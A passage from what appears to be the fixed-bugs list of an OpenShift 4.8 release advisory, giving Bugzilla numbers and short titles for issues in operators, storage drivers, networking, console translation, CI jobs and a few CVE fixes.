registry 1945700 - Syncing boot mode after changing device should be restricted to Supermicro 1945816 - " Ingresses " should be kept in English for Chinese 1945818 - Chinese translation issues: Operator should be the same with English Operators 1945849 - Unnecessary series churn when a new version of kube-state-metrics is rolled out 1945910 - [aws] support byo iam roles for instances 1945948 - SNO: pods can't reach ingress when the ingress uses a different IPv6. 1946079 - Virtual master is not getting an IP address 1946097 - [oVirt] oVirt credentials secret contains unnecessary "ovirt_cafile" 1946119 - panic parsing install-config 1946243 - No relevant error when pg limit is reached in block pools page 1946307 - [CI] [UPI] use a standardized and reliable way to install google cloud SDK in UPI image 1946320 - Incorrect error message in Deployment Attach Storage Page 1946449 - [e2e][automation] Fix cloud-init tests as UI changed 1946458 - Edit Application action overwrites Deployment envFrom values on save 1946459 - In bare metal IPv6 environment, [sig-storage] [Driver: nfs] tests are failing in CI. 1946479 - In k8s 1.21 bump BoundServiceAccountTokenVolume is disabled by default 1946497 - local-storage-diskmaker pod logs "DeviceSymlinkExists" and "not symlinking, could not get lock: " 1946506 - [on-prem] mDNS plugin no longer needed 1946513 - honor use specified system reserved with auto node sizing 1946540 - auth operator: only configure webhook authenticators for internal auth when oauth-apiserver pods are ready 1946584 - Machine-config controller fails to generate MC, when machine config pool with dashes in name presents under the cluster 1946607 - etcd readinessProbe is not reflective of actual readiness 1946705 - Fix issues with "search" capability in the Topology Quick Add component 1946751 - DAY2 Confusing event when trying to add hosts to a cluster that completed installation 1946788 - Serial tests are broken because of router 1946790 - Marketplace operator flakes Available=False OperatorStarting during updates 1946838 - Copied CSVs show up as adopted components 1946839 - [Azure] While mirroring images to private registry throwing error: invalid character '<' looking for beginning of value 1946865 - no "namespace:kube_pod_container_resource_requests_cpu_cores:sum" and "namespace:kube_pod_container_resource_requests_memory_bytes:sum" metrics 1946893 - the error messages are inconsistent in DNS status conditions if the default service IP is taken 1946922 - Ingress details page doesn't show referenced secret name and link 1946929 - the default dns operator's Progressing status is always True and cluster operator dns Progressing status is False 1947036 - "failed to create Matchbox client or connect" on e2e-metal jobs or metal clusters via cluster-bot 1947066 - machine-config-operator pod crashes when noProxy is * 1947067 - [Installer] Pick up upstream fix for installer console output 1947078 - Incorrect skipped status for conditional tasks in the pipeline run 1947080 - SNO IPv6 with 'temporary 60-day domain' option fails with IPv4 exception 1947154 - [master] [assisted operator] Unable to re-register an SNO instance if deleting CRDs during install 1947164 - Print "Successfully pushed" even if the build push fails. 1947176 - OVN-Kubernetes leaves stale AddressSets around if the deletion was missed. 1947293 - IPv6 provision addresses range larger then /64 prefix (e.g. /48) 1947311 - When adding a new node to localvolumediscovery UI does not show pre-existing node name's 1947360 - [vSphere csi driver operator] operator pod runs as “BestEffort” qosClass 1947371 - [vSphere csi driver operator] operator doesn't create “csidriver” instance 1947402 - Single Node cluster upgrade: AWS EBS CSI driver deployment is stuck on rollout 1947478 - discovery v1 beta1 EndpointSlice is deprecated in Kubernetes 1.21 (OCP 4.8) 1947490 - If Clevis on a managed LUKs volume with Ignition enables, the system will fails to automatically open the LUKs volume on system boot 1947498 - policy v1 beta1 PodDisruptionBudget is deprecated in Kubernetes 1.21 (OCP 4.8) 1947663 - disk details are not synced in web-console 1947665 - Internationalization values for ceph-storage-plugin should be in file named after plugin 1947684 - MCO on SNO sometimes has rendered configs and sometimes does not 1947712 - [OVN] Many faults and Polling interval stuck for 4 seconds every roughly 5 minutes intervals. 1947719 - 8 APIRemovedInNextReleaseInUse info alerts display 1947746 - Show wrong kubernetes version from kube-scheduler/kube-controller-manager operator pods 1947756 - [azure-disk-csi-driver-operator] Should allow more nodes to be updated simultaneously for speeding up cluster upgrade 1947767 - [azure-disk-csi-driver-operator] Uses the same storage type in the sc created by it as the default sc? 1947771 - [kube-descheduler]descheduler operator pod should not run as “BestEffort” qosClass 1947774 - CSI driver operators use "Always" imagePullPolicy in some containers 1947775 - [vSphere csi driver operator] doesn’t use the downstream images from payload. 1947776 - [vSphere csi driver operator] Should allow more nodes to be updated simultaneously for speeding up cluster upgrade 1947779 - [LSO] Should allow more nodes to be updated simultaneously for speeding up LSO upgrade 1947785 - Cloud Compute: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert 1947789 - Console: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert 1947791 - MCO: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert 1947793 - DevEx: APIRemovedInNextReleaseInUse info alerts display 1947794 - OLM: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component does not trigger APIRemovedInNextReleaseInUse alert 1947795 - Networking: APIRemovedInNextReleaseInUse info alerts display 1947797 - CVO: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert 1947798 - Images: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert 1947800 - Ingress: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert 1947801 - Kube Storage Version Migrator APIRemovedInNextReleaseInUse info alerts display 1947803 - Openshift Apiserver: APIRemovedInNextReleaseInUse info alerts display 1947806 - Re-enable h2spec, http/2 and grpc-interop e2e tests in openshift/origin 1947828 - download it link should save pod log in -.log format 1947866 - disk.csi.azure.com.spec.operatorLogLevel is not updated when CSO loglevel is changed 1947917 - Egress Firewall does not reliably apply firewall rules 1947946 - Operator upgrades can delete existing CSV before completion 1948011 - openshift-controller-manager constantly reporting type "Upgradeable" status Unknown 1948012 - service-ca constantly reporting type "Upgradeable" status Unknown 1948019 - [4.8] Large number of requests to the infrastructure cinder volume service 1948022 - Some on-prem namespaces missing from must-gather 1948040 - cluster-etcd-operator: etcd is using deprecated logger 1948082 - Monitoring should not set Available=False with no reason on updates 1948137 - CNI DEL not called on node reboot - OCP 4 CRI-O. 1948232 - DNS operator performs spurious updates in response to API's defaulting of daemonset's maxSurge and service's ipFamilies and ipFamilyPolicy fields 1948311 - Some jobs failing due to excessive watches: the server has received too many requests and has asked us to try again later 1948359 - [aws] shared tag was not removed from user provided IAM role 1948410 - [LSO] Local Storage Operator uses imagePullPolicy as "Always" 1948415 - [vSphere csi driver operator] clustercsidriver.spec.logLevel doesn't take effective after changing 1948427 - No action is triggered after click 'Continue' button on 'Show community Operator' windows 1948431 - TechPreviewNoUpgrade does not enable CSI migration 1948436 - The outbound traffic was broken intermittently after shutdown one egressIP node 1948443 - OCP 4.8 nightly still showing v1.20 even after 1.21 merge 1948471 - [sig-auth][Feature:OpenShiftAuthorization][Serial] authorization TestAuthorizationResourceAccessReview should succeed [Suite:openshift/conformance/serial] 1948505 - [vSphere csi driver operator] vmware-vsphere-csi-driver-operator pod restart every 10 minutes 1948513 - get-resources.sh doesn't honor the no_proxy settings 1948524 - 'DeploymentUpdated' Updated Deployment.apps/downloads -n openshift-console because it changed message is printed every minute 1948546 - VM of worker is in error state when a network has port_security_enabled=False 1948553 - When setting etcd spec.LogLevel is not propagated to etcd operand 1948555 - A lot of events "rpc error: code = DeadlineExceeded desc = context deadline exceeded" were seen in azure disk csi driver verification test 1948563 - End-to-End Secure boot deployment fails "Invalid value for input variable" 1948582 - Need ability to specify local gateway mode in CNO config 1948585 - Need a CI jobs to test local gateway mode with bare metal 1948592 - [Cluster Network Operator] Missing Egress Router Controller 1948606 - DNS e2e test fails "[sig-arch] Only known images used by tests" because it does not use a known image 1948610 - External Storage [Driver: disk.csi.azure.com] [Testpattern: Dynamic PV (block volmode)] multiVolume [Slow] should access to two volumes with the same volume mode and retain data across pod recreation on the same node [LinuxOnly] 1948626 - TestRouteAdmissionPolicy e2e test is failing often 1948628 - ccoctl needs to plan for future (non-AWS) platform support in the CLI 1948634 - upgrades: allow upgrades without version change 1948640 - [Descheduler] operator log reports key failed with : kubedeschedulers.operator.openshift.io "cluster" not found 1948701 - unneeded CCO alert already covered by CVO 1948703 - p&f: probes should not get 429s 1948705 - [assisted operator] SNO deployment fails - ClusterDeployment shows bootstrap.ign was not found 1948706 - Cluster Autoscaler Operator manifests missing annotation for ibm-cloud-managed profile 1948708 - cluster-dns-operator includes a deployment with node selector of masters for the IBM cloud managed profile 1948711 - thanos querier and prometheus-adapter should have 2 replicas 1948714 - cluster-image-registry-operator targets master nodes in ibm-cloud-managed-profile 1948716 - cluster-ingress-operator deployment targets master nodes for ibm-cloud-managed profile 1948718 - cluster-network-operator deployment manifest for ibm-cloud-managed profile contains master node selector 1948719 - Machine API components should use 1.21 dependencies 1948721 - cluster-storage-operator deployment targets master nodes for ibm-cloud-managed profile 1948725 - operator lifecycle manager does not include profile annotations for ibm-cloud-managed 1948763 - CVE-2021-23368 nodejs-postcss: Regular expression denial of service during source map parsing 1948771 - ~50% of GCP upgrade jobs in 4.8 failing with "AggregatedAPIDown" alert on packages.coreos.com 1948782 - Stale references to the single-node-production-edge cluster profile 1948787 - secret.StringData shouldn't be used for reads 1948788 - Clicking an empty metrics graph (when there is no data) should still open metrics viewer 1948789 - Clicking on a metrics graph should show request and limits queries as well on the resulting metrics page 1948919 - Need minor update in message on channel modal 1948923 - [aws] installer forces the platform.aws.amiID option to be set, while installing a cluster into GovCloud or C2S region 1948926 - Memory Usage of Dashboard 'Kubernetes / Compute Resources / Pod' contain wrong CPU query 1948936 - [e2e][automation][prow] Prow script point to deleted resource 1948943 - (release-4.8) Limit the number of collected pods in the workloads gatherer 1948953 - Uninitialized cloud provider error when provisioning a cinder volume 1948963 - [RFE] Cluster-api-provider-ovirt should handle hugepages 1948966 - Add the ability to run a gather done by IO via a Kubernetes Job 1948981 - Align dependencies and libraries with latest ironic code 1948998 - style fixes by GoLand and golangci-lint 1948999 - Can not assign multiple EgressIPs to a namespace by using automatic way. 1949019 - PersistentVolumes page cannot sync project status automatically which will block user to create PV 1949022 - Openshift 4 has a zombie problem 1949039 - Wrong env name to get podnetinfo for hugepage in app-netutil 1949041 - vsphere: wrong image names in bundle 1949042 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should pass the http2 tests (on OpenStack) 1949050 - Bump k8s to latest 1.21 1949061 - [assisted operator][nmstate] Continuous attempts to reconcile InstallEnv in the case of invalid NMStateConfig 1949063 - [sig-network] Conntrack should be able to preserve UDP traffic when server pod cycles for a NodePort service 1949075 - Extend openshift/api for Add card customization 1949093 - PatternFly v4.96.2 regression results in a.pf-c-button hover issues 1949096 - Restore private git clone tests 1949099 - network-check-target code cleanup 1949105 - NetworkPolicy ... should enforce ingress policy allowing any port traffic to a server on a specific protocol 1949145 - Move openshift-user-critical priority class to CCO 1949155 - Console doesn't correctly check for favorited or last namespace on load if project picker used 1949180 - Pipelines plugin model kinds aren't picked up by parser 1949202 - sriov-network-operator not available from operatorhub on ppc64le 1949218 - ccoctl not included in container image 1949237 - Bump OVN: Lots of conjunction warnings in ovn-controller container logs 1949277 - operator-marketplace: deployment manifests for ibm-cloud-managed profile have master node selectors 1949294 - [assisted operator] OPENSHIFT_VERSIONS in assisted operator subscription does not propagate 1949306 - need a way to see top API accessors 1949313 - Rename vmware-vsphere- images to vsphere- images before 4.8 ships 1949316 - BaremetalHost resource automatedCleaningMode ignored due to outdated vendoring 1949347 - apiserver-watcher support for dual-stack 1949357 - manila-csi-controller pod not running due to secret lack(in another ns) 1949361 - CoreDNS resolution failure for external hostnames with "A: dns: overflow unpacking uint16" 1949364 - Mention scheduling profiles in scheduler operator repository 1949370 - Testability of: Static pod installer controller deadlocks with non-existing installer pod, WAS: kube-apisrever of clsuter operator always with incorrect status due to pleg error 1949384 - Edit Default Pull Secret modal - i18n misses 1949387 - Fix the typo in auto node sizing script 1949404 - label selector on pvc creation page - i18n misses 1949410 - The referred role doesn't exist if create rolebinding from rolebinding tab of role page 1949411 - VolumeSnapshot, VolumeSnapshotClass and VolumeSnapshotConent Details tab is not translated - i18n misses 1949413 - Automatic boot order setting is done incorrectly when using by-path style device names 1949418 - Controller factory workers should always restart on panic() 1949419 - oauth-apiserver logs "[SHOULD NOT HAPPEN] failed to update managedFields for authentication.k8s.io/v1, Kind=TokenReview: failed to convert new object (authentication.k8s.io/v1, Kind=TokenReview)" 1949420 - [azure csi driver operator] pvc.status.capacity and pv.spec.capacity are processed not the same as in-tree plugin 1949435 - ingressclass controller doesn't recreate the openshift-default ingressclass after deleting it 1949480 - Listeners timeout are constantly being updated 1949481 - cluster-samples-operator restarts approximately two times per day and logs too many same messages 1949509 - Kuryr should manage API LB instead of CNO 1949514 - URL is not visible for routes at narrow screen widths 1949554 - Metrics of vSphere CSI driver sidecars are not collected 1949582 - OCP v4.7 installation with OVN-Kubernetes fails with error "egress bandwidth restriction -1 is not equals" 1949589 - APIRemovedInNextEUSReleaseInUse Alert Missing 1949591 - Alert does not catch removed api usage during end-to-end tests. 1949593 - rename DeprecatedAPIInUse alert to APIRemovedInNextReleaseInUse 1949612 - Install with 1.21 Kubelet is spamming logs with failed to get stats failed command 'du' 1949626 - machine-api fails to create AWS client in new regions 1949661 - Kubelet Workloads Management changes for OCPNODE-529 1949664 - Spurious keepalived liveness probe failures 1949671 - System services such as openvswitch are stopped before pod containers on system shutdown or reboot 1949677 - multus is the first pod on a new node and the last to go ready 1949711 - cvo unable to reconcile deletion of openshift-monitoring namespace 1949721 - Pick 99237: Use the audit ID of a request for better correlation 1949741 - Bump golang version of cluster-machine-approver 1949799 - ingresscontroller should deny the setting when spec.tuningOptions.threadCount exceed 64 1949810 - OKD 4.7 unable to access Project Topology View 1949818 - Add e2e test to perform MCO operation Single Node OpenShift 1949820 - Unable to use oc adm top is shortcut when asking for imagestreams 1949862 - The ccoctl tool hits the panic sometime when running the delete subcommand 1949866 - The ccoctl fails to create authentication file when running the command ccoctl aws create-identity-provider with --output-dir parameter 1949880 - adding providerParameters.gcp.clientAccess to existing ingresscontroller doesn't work 1949882 - service-idler build error 1949898 - Backport RP#848 to OCP 4.8 1949907 - Gather summary of PodNetworkConnectivityChecks 1949923 - some defined rootVolumes zones not used on installation 1949928 - Samples Operator updates break CI tests 1949935 - Fix incorrect access review check on start pipeline kebab action 1949956 - kaso: add minreadyseconds to ensure we don't have an LB outage on kas 1949967 - Update Kube dependencies in MCO to 1.21 1949972 - Descheduler metrics: populate build info data and make the metrics entries more readeable 1949978 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should pass the h2spec conformance tests [Suite:openshift/conformance/parallel/minimal] 1949990 - (release-4.8) Extend the OLM operator gatherer to include CSV display name 1949991 - openshift-marketplace pods are crashlooping 1950007 - [CI] [UPI] easy_install is not reliable enough to be used in an image 1950026 - [Descheduler] Need better way to handle evicted pod count for removeDuplicate pod strategy 1950047 - CSV deployment template custom annotations are not propagated to deployments 1950112 - SNO: machine-config pool is degraded: error running chcon -R -t var_run_t /run/mco-machine-os-content/os-content-321709791 1950113 - in-cluster operators need an API for additional AWS tags 1950133 - MCO creates empty conditions on the kubeletconfig object 1950159 - Downstream ovn-kubernetes repo should have no linter errors 1950175 - Update Jenkins and agent base image to Go 1.16 1950196 - ssh Key is added even with 'Expose SSH access to this virtual machine' unchecked 1950210 - VPA CRDs use deprecated API version 1950219 - KnativeServing is not shown in list on global config page 1950232 - [Descheduler] - The minKubeVersion should be 1.21 1950236 - Update OKD imagestreams to prefer centos7 images 1950270 - should use "kubernetes.io/os" in the dns/ingresscontroller node selector description when executing oc explain command 1950284 - Tracking bug for NE-563 - support user-defined tags on AWS load balancers 1950341 - NetworkPolicy: allow-from-router policy does not allow access to service when the endpoint publishing strategy is HostNetwork on OpenshiftSDN network 1950379 - oauth-server is in pending/crashbackoff at beginning 50% of CI runs 1950384 - [sig-builds][Feature:Builds][sig-devex][Feature:Jenkins][Slow] openshift pipeline build perm failing 1950409 - Descheduler operator code and docs still reference v1beta1 1950417 - The Marketplace Operator is building with EOL k8s versions 1950430 - CVO serves metrics over HTTP, despite a lack of consumers 1950460 - RFE: Change Request Size Input to Number Spinner Input 1950471 - e2e-metal-ipi-ovn-dualstack is failing with etcd unable to bootstrap 1950532 - Include "update" when referring to operator approval and channel 1950543 - Document non-HA behaviors in the MCO (SingleNodeOpenshift) 1950590 - CNO: Too many OVN netFlows collectors causes ovnkube pods CrashLoopBackOff 1950653 - BuildConfig ignores Args 1950761 - Monitoring operator deployments anti-affinity rules prevent their rollout on single-node 1950908 - kube_pod_labels metric does not contain k8s labels 1950912 - [e2e][automation] add devconsole tests 1950916 - [RFE]console page show error when vm is poused 1950934 - Unnecessary rollouts can happen due to unsorted endpoints 1950935 - Updating cluster-network-operator builder & base images to be consistent with ART 1950978 - the ingressclass cannot be removed even after deleting the related custom ingresscontroller 1951007 - ovn master pod crashed 1951029 - Drainer panics on missing context for node patch 1951034 - (release-4.8) Split up the GatherClusterOperators into smaller parts 1951042 - Panics every few minutes in kubelet logs post-rebase 1951043 - Start Pipeline Modal Parameters should accept empty string defaults 1951058 - [gcp-pd-csi-driver-operator] topology and multipods capabilities are not enabled in e2e tests 1951066 - [IBM][ROKS] Enable volume snapshot controllers on IBM Cloud 1951084 - avoid benign "Path \"/run/secrets/etc-pki-entitlement\" from \"/etc/containers/mounts.conf\" doesn't exist, skipping" messages 1951158 - Egress Router CRD missing Addresses entry 1951169 - Improve API Explorer discoverability from the Console 1951174 - re-pin libvirt to 6.0.0 1951203 - oc adm catalog mirror can generate ICSPs that exceed etcd's size limit 1951209 - RerunOnFailure runStrategy shows wrong VM status (Starting) on Succeeded VMI 1951212 - User/Group details shows unrelated subjects in role bindings tab 1951214 - VM list page crashes when the volume type is sysprep 1951339 - Cluster-version operator does not manage operand container environments when manifest lacks opinions 1951387 - opm index add doesn't respect deprecated bundles 1951412 - Configmap gatherer can fail incorrectly 1951456 - Docs and linting fixes 1951486 - Replace "kubevirt_vmi_network_traffic_bytes_total" with new metrics names 1951505 - Remove deprecated techPreviewUserWorkload field from CMO's configmap 1951558 - Backport Upstream 101093 for Startup Probe Fix 1951585 - enterprise-pod fails to build 1951636 - assisted service operator use default serviceaccount in operator bundle 1951637 - don't rollout a new kube-apiserver revision on oauth accessTokenInactivityTimeout changes 1951639 - Bootstrap API server unclean shutdown causes reconcile delay 1951646 - Unexpected memory climb while container not in use 1951652 - Add retries to opm index add 1951670 - Error gathering bootstrap log after pivot: The bootstrap machine did not execute the release-image.service systemd unit 1951671 - Excessive writes to ironic Nodes 1951705 - kube-apiserver needs alerts on CPU utlization 1951713 - [OCP-OSP] After changing image in machine object it enters in Failed - Can't find created instance 1951853 - dnses.operator.openshift.io resource's spec.nodePlacement.tolerations godoc incorrectly describes default behavior 1951858 - unexpected text '0' on filter toolbar on RoleBinding tab 1951860 - [4.8] add Intel XXV710 NIC model (1572) support in SR-IOV Operator 1951870 - sriov network resources injector: user defined injection removed existing pod annotations 1951891 - [migration] cannot change ClusterNetwork CIDR during migration 1951952 - [AWS CSI Migration] Metrics for cloudprovider error requests are lost 1952001 - Delegated authentication: reduce the number of watch requests 1952032 - malformatted assets in CMO 1952045 - Mirror nfs-server image used in jenkins-e2e 1952049 - Helm: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert 1952079 - rebase openshift/sdn to kube 1.21 1952111 - Optimize importing from @patternfly/react-tokens 1952174 - DNS operator claims to be done upgrading before it even starts 1952179 - OpenStack Provider Ports UI Underscore Variables 1952187 - Pods stuck in ImagePullBackOff with errors like rpc error: code = Unknown desc = Error committing the finished image: image with ID "SomeLongID" already exists, but uses a different top layer: that ID 1952211 - cascading mounts happening exponentially on when deleting openstack-cinder-csi-driver-node pods 1952214 - Console Devfile Import Dev Preview broken 1952238 - Catalog pods don't report termination logs to catalog-operator 1952262 - Need support external gateway via hybrid overlay 1952266 - etcd operator bumps status.version[name=operator] before operands update 1952268 - etcd operator should not set Degraded=True EtcdMembersDegraded on healthy machine-config node reboots 1952282 - CSR approver races with nodelink controller and does not requeue 1952310 - VM cannot start up if the ssh key is added by another template 1952325 - [e2e][automation] Check support modal in ssh tests and skip template parentSupport 1952333 - openshift/kubernetes vulnerable to CVE-2021-3121 1952358 - Openshift-apiserver CO unavailable in fresh OCP 4.7.5 installations 1952367 - No VM status on overview page when VM is pending 1952368 - worker pool went degraded due to no rpm-ostree on rhel worker during applying new mc 1952372 - VM stop action should not be there if the VM is not running 1952405 - console-operator is not reporting correct Available status 1952448 - Switch from Managed to Disabled mode: no IP removed from configuration and no container metal3-static-ip-manager stopped 1952460 - In k8s 1.21 bump '[sig-network] Firewall rule control plane should not expose well-known ports' test is disabled 1952473 - Monitor pod placement during upgrades 1952487 - Template filter does not work properly 1952495 - “Create” button on the Templates page is confuse 1952527 - [Multus] multi-networkpolicy does wrong filtering 1952545 - Selection issue when inserting YAML snippets 1952585 - Operator links for 'repository' and 'container image' should be clickable in OperatorHub 1952604 - Incorrect port in external loadbalancer config 1952610 - [aws] image-registry panics when the cluster is installed in a new region 1952611 - Tracking bug for OCPCLOUD-1115 - support user-defined tags on AWS EC2 Instances 1952618 - 4.7.4->4.7.8 Upgrade Caused OpenShift-Apiserver Outage 1952625 - Fix translator-reported text issues 1952632 - 4.8 installer should default ClusterVersion channel to stable-4.8 1952635 - Web console displays a blank page- white space instead of cluster information 1952665 - [Multus] multi-networkpolicy pod continue restart due to OOM (out of memory) 1952666 - Implement Enhancement 741 for Kubelet 1952667 - Update Readme for cluster-baremetal-operator with details about the operator 1952684 - cluster-etcd-operator: metrics controller panics on invalid response from client 1952728 - It was not clear for users why Snapshot feature was not available 1952730 - “Customize virtual machine” and the “Advanced” feature are confusing in wizard 1952732 - Users did not understand the boot source labels 1952741 - Monitoring DB: after set Time Range as Custom time range, no data display 1952744 - PrometheusDuplicateTimestamps with user workload monitoring enabled 1952759 - [RFE]It was not immediately clear what the Star icon meant 1952795 - cloud-network-config-controller CRD does not specify correct plural name 1952819 - failed to configure pod interface: error while waiting on flows for pod: timed out waiting for OVS flows 1952820 - [LSO] Delete localvolume pv is failed 1952832 - [IBM][ROKS] Enable the Web console UI to deploy OCS in External mode on IBM Cloud 1952891 - Upgrade failed due to cinder csi driver not deployed 1952904 - Linting issues in gather/clusterconfig package 1952906 - Unit tests for configobserver.go 1952931 - CI does not check leftover PVs 1952958 - Runtime error loading console in Safari 13 1953019 - [Installer][baremetal][metal3] The baremetal IPI installer fails on delete cluster with: failed to clean baremetal bootstrap storage pool 1953035 - Installer should error out if publish: Internal is set while deploying OCP cluster on any on-prem platform 1953041 - openshift-authentication-operator uses 3.9k% of its requested CPU 1953077 - Handling GCP's: Error 400: Permission accesscontextmanager.accessLevels.list is not valid for this resource 1953102 - kubelet CPU use during an e2e run increased 25% after rebase 1953105 - RHCOS system components registered a 3.5x increase in CPU use over an e2e run before and after 4/9 1953169 - endpoint slice controller doesn't handle services target port correctly 1953257 - Multiple EgressIPs per node for one namespace when "oc get hostsubnet" 1953280 - DaemonSet/node-resolver is not recreated by dns operator after deleting it 1953291 - cluster-etcd-operator: peer cert DNS SAN is populated incorrectly 1953418 - [e2e][automation] Fix vm wizard validate tests 1953518 - thanos-ruler pods failed to start up for "cannot unmarshal DNS message" 1953530 - Fix openshift/sdn unit test flake 1953539 - kube-storage-version-migrator: priorityClassName not set 1953543 - (release-4.8) Add missing sample archive data 1953551 - build failure: unexpected trampoline for shared or dynamic linking 1953555 - GlusterFS tests fail on ipv6 clusters 1953647 - prometheus-adapter should have a PodDisruptionBudget in HA topology 1953670 - ironic container image build failing because esp partition size is too small 1953680 - ipBlock ignoring all other cidr's apart from the last one specified 1953691 - Remove unused mock 1953703 - Inconsistent usage of Tech preview badge in OCS plugin of OCP Console 1953726 - Fix issues related to loading dynamic plugins 1953729 - e2e unidling test is flaking heavily on SNO jobs 1953795 - Ironic can't virtual media attach ISOs sourced from ingress routes 1953798 - GCP e2e (parallel and upgrade) regularly trigger KubeAPIErrorBudgetBurn alert, also happens on AWS 1953803 - [AWS] Installer should do pre-check to ensure user-provided private hosted zone name is valid for OCP cluster 1953810 - Allow use of storage policy in VMC environments 1953830 - The oc-compliance build does not available for OCP4.8 1953846 - SystemMemoryExceedsReservation alert should consider hugepage reservation 1953977 - [4.8] packageserver pods restart many times on the SNO cluster 1953979 - Ironic caching virtualmedia images results in disk space limitations 1954003 - Alerts shouldn't report any alerts in firing or pending state: openstack-cinder-csi-driver-controller-metrics TargetDown 1954025 - Disk errors while scaling up a node with multipathing enabled 1954087 - Unit tests for kube-scheduler-operator 1954095 - Apply user defined tags in AWS Internal Registry 1954105 - TaskRuns Tab in PipelineRun Details Page makes cluster based calls for TaskRuns 1954124 - oc set volume not adding storageclass to pvc which leads to issues using snapshots 1954150 - CVE-2021-23382 nodejs-postcss: ReDoS via getAnnotationURL() and loadAnnotation() in lib/previous-map.js 1954177 - machine-api: admissionReviewVersions v1beta1 is going to be removed in 1.22 1954187 - multus: admissionReviewVersions v1beta1 is going to be removed in 1.22 1954248 - Disable Alertmanager Protractor e2e tests 1954317 - [assisted operator] Environment variables set in the subscription not being inherited by the assisted-service container 1954330 - NetworkPolicy: allow-from-router with label policy-group.network.openshift.io/ingress: "" does not work on a upgraded cluster 1954421 - Get 'Application is not available' when access Prometheus UI 1954459 - Error: Gateway Time-out display on Alerting console 1954460 - UI, The status of "Used Capacity Breakdown [Pods]" is "Not available" 1954509 - FC volume is marked as unmounted after failed reconstruction 1954540 - Lack translation for local language on pages under storage menu 1954544 - authn operator: endpoints controller should use the context it creates 1954554 - Add e2e tests for auto node sizing 1954566 - Cannot update a component (UtilizationCard) error when switching perspectives manually 1954597 - Default image for GCP does not support ignition V3 1954615 - Undiagnosed panic detected in pod: pods/openshift-cloud-credential-operator_cloud-credential-operator 1954634 - apirequestcounts does not honor max users 1954638 - apirequestcounts should indicate removedinrelease of empty instead of 2.0 1954640 - Support of gatherers with different periods 1954671 - disable volume expansion support in vsphere csi driver storage class 1954687 - localvolumediscovery and localvolumset e2es are disabled 1954688 - LSO has missing examples for localvolumesets 1954696 - [API-1009] apirequestcounts should indicate useragent 1954715 - Imagestream imports become very slow when doing many in parallel 1954755 - Multus configuration should allow for net-attach-defs referenced in the openshift-multus namespace 1954765 - CCO: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert 1954768 - baremetal-operator: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert 1954770 - Backport upstream fix for Kubelet getting stuck in DiskPressure 1954773 - OVN: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component does not trigger APIRemovedInNextReleaseInUse alert 1954783 - [aws] support byo private hosted zone 1954790 - KCM Alert PodDisruptionBudget At and Limit do not alert with maxUnavailable or MinAvailable by percentage 1954830 - verify-client-go job is failing for release-4.7 branch 1954865 - Add necessary priority class to pod-identity-webhook deployment 1954866 - Add necessary priority class to downloads 1954870 - Add necessary priority class to network components 1954873 - dns server may not be specified for clusters with more than 2 dns servers specified by openstack. 1954891 - Add necessary priority class to pruner 1954892 - Add necessary priority class to ingress-canary 1954931 - (release-4.8) Remove legacy URL anonymization in the ClusterOperator related resources 1954937 - [API-1009] oc get apirequestcount shows blank for column REQUESTSINCURRENTHOUR 1954959 - unwanted decorator shown for revisions in topology though should only be shown only for knative services 1954972 - TechPreviewNoUpgrade featureset can be undone 1954973 - "read /proc/pressure/cpu: operation not supported" in node-exporter logs 1954994 - should update to 2.26.0 for prometheus resources label 1955051 - metrics "kube_node_status_capacity_cpu_cores" does not exist 1955089 - Support [sig-cli] oc observe works as expected test for IPv6 1955100 - Samples: APIRemovedInNextReleaseInUse info alerts display 1955102 - Add vsphere_node_hw_version_total metric to the collected metrics 1955114 - 4.7-e2e-metal-ipi-ovn-dualstack intermittent test failures, worker hostname is overwritten by NM 1955196 - linuxptp-daemon crash on 4.8 1955226 - operator updates apirequestcount CRD over and over 1955229 - release-openshift-origin-installer-e2e-aws-calico-4.7 is permfailing 1955256 - stop collecting API that no longer exists 1955324 - Kubernetes Autoscaler should use Go 1.16 for testing scripts 1955336 - Failure to Install OpenShift on GCP due to Cluster Name being similar to / contains "google" 1955414 - 4.8 -> 4.7 rollbacks broken on unrecognized flowschema openshift-etcd-operator 1955445 - Drop crio image metrics with high cardinality 1955457 - Drop container_memory_failures_total metric because of high cardinality 1955467 - Disable collection of node_mountstats_nfs metrics in node_exporter 1955474 - [aws-ebs-csi-driver] rebase from version v1.0.0 1955478 - Drop high-cardinality metrics from kube-state-metrics which aren't used 1955517 - Failed to upgrade from 4.6.25 to 4.7.8 due to the machine-config degradation 1955548 - [IPI][OSP] OCP 4.6/4.7 IPI with kuryr exceeds defined serviceNetwork range 1955554 - MAO does not react to events triggered from Validating Webhook Configurations 1955589 - thanos-querier should have a PodDisruptionBudget in HA topology 1955595 - Add DevPreviewLongLifecycle Descheduler profile 1955596 - Pods stuck in creation phase on realtime kernel SNO 1955610 - release-openshift-origin-installer-old-rhcos-e2e-aws-4.7 is permfailing 1955622 - 4.8-e2e-metal-assisted jobs: Timeout of 360 seconds expired waiting for Cluster to be in status ['installing', 'error'] 1955701 - [4.8] RHCOS boot image bump for RHEL 8.4 Beta 1955749 - OCP branded templates need to be translated 1955761 - packageserver clusteroperator does not set reason or message for Available condition 1955783 - NetworkPolicy: ACL audit log message for allow-from-router policy should also include the namespace to distinguish between two policies similarly named configured in respective namespaces 1955803 - OperatorHub - console accepts any value for "Infrastructure features" annotation 1955822 - 